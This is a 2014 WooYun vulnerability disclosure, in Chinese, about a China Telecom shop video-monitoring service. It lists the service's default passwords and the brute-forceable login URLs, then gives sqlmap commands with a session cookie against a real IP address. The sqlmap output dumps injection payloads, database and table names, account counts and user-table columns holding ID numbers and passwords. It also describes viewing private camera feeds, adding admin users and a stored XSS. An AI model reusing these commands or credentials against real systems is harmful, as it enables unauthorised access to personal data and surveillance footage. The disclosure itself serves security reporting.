当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078416

漏洞标题:中国电信某视频监控系统存在默认密码且后台存在sql注入及存储型xss,大量账户及监控视频泄漏

相关厂商:中国电信

漏洞作者: kttzd

提交时间:2014-10-06 22:51

修复时间:2014-11-20 22:56

公开时间:2014-11-20 22:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-06: 细节已通知厂商并且等待厂商处理中
2014-10-11: 厂商已经确认,细节仅向厂商公开
2014-10-21: 细节向核心白帽子及相关领域专家公开
2014-10-31: 细节向普通白帽子公开
2014-11-10: 细节向实习白帽子公开
2014-11-20: 细节向公众公开

简要描述:

什么?妹子在洗澡!!

详细说明:

中国电信“平安商铺”视频看护系统
普通用户登录:http://pa.jsict.com/globeyes/user/index.jsp 没有验证码可以爆破
管理员用户登录:http://pa.jsict.com:8080/globeyes/admin/
从视频看护系统的文档得知,普通用户默认密码:123456 和111222 其中大量用户没有更改可爆破
试了试一个普通用户账户登录 test123 密码 123456
进来了
本来看了看后台,没有什么可以利用的就想放弃来的,但是最后让我找到了一处注入.....
后台注入要cookie,抓个包看一看。
注入:
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9"

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=27516 AND 2666=2666
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=27516 AND (SELECT 7563 FROM(SELECT COUNT(*),CONCAT(0x7162797871,(SELECT (CASE WHEN (7563=7563) THEN 1 ELSE 0 END)),0x716d797371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=27516 AND SLEEP(5)
---
[19:33:15] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" --dbs

available databases [3]:
[*] globeyes
[*] information_schema
[*] test


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes --tables

Database: globeyes
[57 tables]
+----------------------+
| Dswitcher |
| Rdetail |
| user |
| admin |
| admin_log |
| alarm_dispose |
| alarm_setting |
| area |
| child_terminal |
| client_session |
| defence_area |
| dispmsg |
| dispmsg_bak |
| emergency_notify |
| ensure_msg_queue |
| feeset |
| hd_info |
| host_info |
| input_channel |
| maintenance_record |
| manufacturer |
| message_list |
| message_recycle |
| monitor_event |
| multimedia_queue |
| notify_service |
| notify_service_temp |
| partition_list |
| police |
| police_service |
| police_watcher |
| process_info |
| process_list |
| product |
| saveinfo |
| service_monitor |
| session_check |
| sms_log |
| sms_queue |
| software_version |
| storage |
| store_setup |
| system_stat |
| system_status |
| tccs_session |
| terminal |
| terminal_log |
| terminal_online_time |
| terminal_param |
| test_table |
| uptown |
| user_fee |
| user_log |
| user_message |
| voice_log |
| voice_queue |
| watcher_log |
+----------------------+


管理账户在admin 普通用户在user
看一下里面有多少数据
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T user --count

Database: globeyes
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 8547 |
+--------+---------+


sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T admin --count

Database: globeyes
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 197 |
+-------+---------+


看看里面都记录了什么
sqlmap -u "http://61.177.19.66:6886/globeyes/user/vedio_setup.jsp?id=27516" --cookie "JSESSIONID=7B94442F8CAD79FA8278C1C3A8DC72F9" -D globeyes -T user --columns

Database: globeyes
Table: user
[37 columns]
+----------------+------------------+
| Column | Type |
+----------------+------------------+
| level | tinyint(3) |
| user | varchar(64) |
| address | varchar(255) |
| area_id | int(11) |
| balance | int(11) |
| birthday | varchar(20) |
| check_account | varchar(32) |
| city | varchar(32) |
| country | varchar(32) |
| create_date | varchar(20) |
| disk_size | bigint(20) |
| email | varchar(128) |
| finger_id | varchar(32) |
| fingerid | varchar(32) |
| from_platform | varchar(32) |
| gender | tinyint(4) |
| id | bigint(20) |
| idcard | varchar(24) |
| max_child_num | int(11) |
| max_device | int(11) |
| mobile | varchar(64) |
| mobile_service | tinyint(4) |
| parent_id | bigint(20) |
| password | varchar(128) |
| pay_method | tinyint(4) |
| phone | varchar(64) |
| platform | tinyint(4) |
| province | varchar(32) |
| realname | varchar(64) |
| start_date | varchar(20) |
| status | tinyint(4) |
| stop_date | varchar(20) |
| store_time | int(10) unsigned |
| test_user | tinyint(4) |
| used_space | bigint(20) |
| validate_type | tinyint(4) |
| zip | varchar(8) |
+----------------+------------------+


这个要是泄漏了跟查水表没什么区别....

漏洞证明:

随便找几个管理用户登录一下

视频监控.png


视频监控02.png


视频监控03.png


视频监控04.png


视频监控05.png


视频监控06.png


任意管理用户添加

视频监控添加用户.png


管理员好像能任意重置任何人的密码,未测试.
后台系统管理处软件版本发布一处xss

后台xss.png


从前台能访问....
http://pa.jsict.com:8080/globeyes/user/load.jsp?PG=1

后台xss02.png


附一个监控

监控系统07.png

修复方案:

你们比我懂

版权声明:转载请注明来源 kttzd@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-10-11 16:42

厂商回复:

最新状态:

暂无